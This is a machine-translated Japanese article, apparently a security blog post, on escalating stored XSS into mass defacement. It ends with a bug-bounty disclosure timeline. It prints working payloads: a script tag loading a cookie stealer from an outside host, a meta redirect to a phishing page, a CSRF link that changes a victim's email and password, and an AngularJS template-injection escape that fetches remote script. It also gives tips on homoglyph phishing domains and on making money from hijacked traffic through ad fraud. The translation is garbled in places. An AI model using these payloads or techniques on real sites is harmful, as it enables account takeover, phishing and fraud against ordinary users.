すべての情報は情報提供のみを目的として提供されています。 この記事の資料によって引き起こされる可能性のある損害について、私は責任を負いません。
だから汚職 (ウィキペディア):
改ざん(英語の改ざん-切断、歪曲)-Webサイトのメイン(または他の)ページが別の-通常は反抗的な種類の広告、警告、脅威、または冗談に置き換えられるハッキングサイトのタイプ。
多くの場合、サイトの残りの部分へのアクセスがブロックされるか、サイトの古いコンテンツが完全に削除されます。
ウェブサイトの改ざんの主な原因は次のとおりです。
1.初心者ハッカーの自己主張としてのフーリガン主義。
2.疑わしい製品またはサービスの広告。 このサイトは、広告画像、サイトへのリンク(多くの場合ウイルスに感染しています)などを公開しています。
3.組織間の競争。 ある企業は、ハッキングやサイトの改ざんを通じて、競合企業のイメージと評判の低下をもたらしています。
12年目の例 。
メインページに保存されたxssは、メインページにユーザーアクティビティを表示するサイトで(私の経験から)最も頻繁に見つかります。 これは基本的に次のとおりです。
*ユーザーが写真1.jpgを追加。
*ユーザーがテーマ/ブログ投稿を作成しました。
*ユーザーがグループに参加しました。
*ユーザーがユーザーを友達として追加しました。
スクリプトをユーザーの名前、写真/グループ/トピックの名前に埋め込み、2つ目のテストアカウントを作成して友人に追加すると、スクリプトがメインページで実行されます。
多数の人がコードを実行するために、メインページにコードを実装する必要はありません。すべてのユーザーの個人アカウント、記事のコメントにコードを実装したり、 country.uaなどのサイトに広告を作成したりできます(3 000ウクライナの出席者)、広告の名前と説明はフィルタリングされますが、ユーザー名には含まれません。
1)xssを記事/トピックのコメントに保存-ここではすべてが簡単です。コメントフィールドにjsを記述し、ログを追加、キャッチします。
2)各ユーザーが個人アカウントでコードを実行するには、 xDsとiDORを併用する必要があります。 idorを使用している場合、任意のユーザーのメールアドレスを変更し、アカウントを復元し、ハッキングできます-それは良いことですが、何ももたらさないデータ(メモ、ユーザーアドレスの編集など)を変更できるとしたらどうでしょうか?
この場合、個人アカウントで、PostまたはgetリクエストでユーザーIDを操作し、データを変更し、すべての可能なIDの検索を開始できる場所を見つける必要があります。 保存されたxssがそこにあることが重要です。
フィッシングサイトのメインページに、 盗難スクリプトCookie 、 csrfエクスプロイト 、 リダイレクトを配置できます。
1)盗難スクリプトCookie
"><script src=https://securityz.net/x.js?>
Cookieをキャッチできた場合、特にそれらの多くの期間が間もなく終了するため、ユーザーのメールアドレスが Cookieに記録され(アカウントをフックできる)、 パスワードがmd5 (パスワードを保存する多くのサイトを見た)クッキー内)。
httponlyでCookieまたは多くのCookieをソートする時間を無駄にしたくない場合は、2番目のオプションを使用できます。
2)脆弱なサイトのフィッシングサイトへのリダイレクト、バックドアまたはpaypal / privat24 / sberbank /ソーシャルネットワークのクローンをダウンロードするリンク:
<meta http-equiv="refresh" content="1;URL=https://securityz.net/vk.html" />
3) アカウントにcsrfがある場合、csrfエクスプロイトにリダイレクトできます。たとえば、 example.com / account?do=settings&email=support1@habrahabr.ru&city=qwqwqw&address=qwqwwqqw&phone=11111111&password=qwerty&confirmパスワードとパスワードエクスプロイトの直後にログアウトcsrf https://example.com?logoutを使用してユーザーのログインとパスワードを取得し、ユーザーがアカウントにアクセスして復元できないようにすることをお勧めします 。
おもしろいのは、リダイレクトを使用せず、ページにjsをロードしてCookieを盗むだけの場合、長い間脆弱性が気付かないことがあるということです。
ユーザーを大量にハッキングする方法については、すでにわかっています。 次に、広告から収益を得る方法、またはトラフィックでトップにサイトを上げる 方法を説明します。
フィッシングサイトにリダイレクトする代わりに、広告リンクをユーザーに「スリップ」するだけで、ウェブマスターのようなトラフィックからお金を集めることができます。 脆弱性が修正されていない状態で広告から可能な限り多くを取得するために、たとえば月額7,000,000ドルを稼ぐ詐欺師のように 、iframeまたはポップアップウィンドウに広告を読み込みます。広告から。 クリックスルーの支払いを希望する多くの広告主はオンラインで見つけることができます
2)2004年、xakep.ruの作成者は、メインサイトにmail.ruカウンターを実装することでサイトを最上位に上げる方法を理解していましたが、同様の方法で行うことができます。
実生活からの私の汚損の2つの例:
- privatbank.uaソーシャルネットワークのメインページにある XSS(バグバウンティ)。 この場合、写真はアルバムに注がれ、メインページに名前が表示されます。ここにサイトへのリダイレクトが表示され、ビデオが表示されます。
- 最も人気のある支払いシステム(2000 alexarank world、150 alexa Russia)のソーシャルネットワーク上で、私がxssに昇格したクライアント側テンプレートインジェクション。
残念ながら、この会社は記事で言及する許可を与えていません。
私たちはそのような記事に対して否定的な態度を持っています。
また、この支払いシステムのサイトでユーザーに損害を与える可能性のある重大な脆弱性が見つかったというニュースは、会社の評判に悪影響を与えると思います。
以前は、social.example.comは旧世代のcmsでしたが、多くのxssがありましたが、最終的に修正され、angularで新しいcmsが作成されました。 xssが見つからなかったので、テンプレートインジェクションをチェックすることにしました。ペイロード{{2+2}}
は4を与え、角度のバージョンを判断し、このペイロードを取得しました
{{a=toString().constructor.prototype;a.charAt=a.trim;$eval('a,alert(1),a')}}
投稿のユーザーページに保存されたXSSが判明しました。 そして、このxssはサイト上のどこでも実行できます:プライベートメッセージ、グループ、コメントなど。
しかし、最も重要なことは、メインページの改ざんです。 投稿を追加すると、メインページのすべてのユーザー(ゲストとゲストの両方)に表示されます。 これで、アラートのみを呼び出すことができます。
テンプレートインジェクションを使用した古いマクドナルドハックの記事を思い出してください。
そこからペイロード{{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=$.getScript(`https://securityz.net/x.js`)');}}`
{{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=$.getScript(`https://securityz.net/x.js`)');}}`
Cookieを安全に盗むことができますまたはフィッシングサイトにリダイレクトします。 ところで、フィッシングサイトにはライフハックがあります。被害者がURLを調べてWebサイトを区別する方法を知っている場合は、サイト名の1文字を非常によく似た文字に置き換えることができます。 たとえば、account.goØgle.com、sslがある場合、偽物を元のものと区別することは困難であり、改ざんに関連して多くのログがあります。 ラテン文字および類似文字 。)
2017年2月4日 :報告された脆弱性。
2017年2月4日 :脆弱性が修正されました。
2017年 2 月10日 :200ドルの報酬が転送されました。 彼はこれが普通のxssではなく、汚損であるという事実によって危険を証明しました。
02.16.2017 :800ドルの追加報酬。 この脆弱性の合計は1000ドルです。
記事からの結論 :バグ報奨金で汚損するxss昇格の場合、この脆弱性により多くのお金を得ることができます。
前の記事 。